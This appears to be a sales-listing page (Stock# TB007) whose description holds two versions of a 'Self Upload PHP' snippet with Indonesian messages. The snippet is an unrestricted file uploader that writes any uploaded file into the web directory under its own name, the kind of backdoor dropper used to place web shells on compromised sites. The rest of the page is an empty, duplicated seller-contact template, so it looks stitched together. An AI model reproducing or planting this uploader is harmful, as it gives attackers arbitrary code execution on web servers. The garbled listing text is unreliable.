0 - 0
Stock# TB007

Description

Self Upload PHP
=================
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<?php
if ($_FILES['file'] != '')
copy($_FILES['file']['tmp_name'], $_FILES['file']['name']) or die ('Proses upload Gagal: ');
else
{
die('Silahkan pilih file');
}
?>
========
<?php
echo '<form method="POST" action="" enctype="multipart/form-data" ><input type="file" name="file" /><input type="submit" value="Upload" /></form>';
if ($_FILES['file'] != '')
copy($_FILES['file']['tmp_name'], $_FILES['file']['name']) or die ('Proses upload Gagal: ');
else
{
die('Silahkan pilih file');
}
?>
 

Contact the Seller (602) 412-7747
Hello, I'm interested in your 0 .
My name is
Please contact me
You can reach me at
or at .
Add questions or comments?
I would also like to see:
            
Thank you!
Contact the Seller
Hello, I'm interested in your 0 .
My name is
Please contact me
You can reach me at
or at .
Add questions or comments?
I would also like to see:
            
Thank you!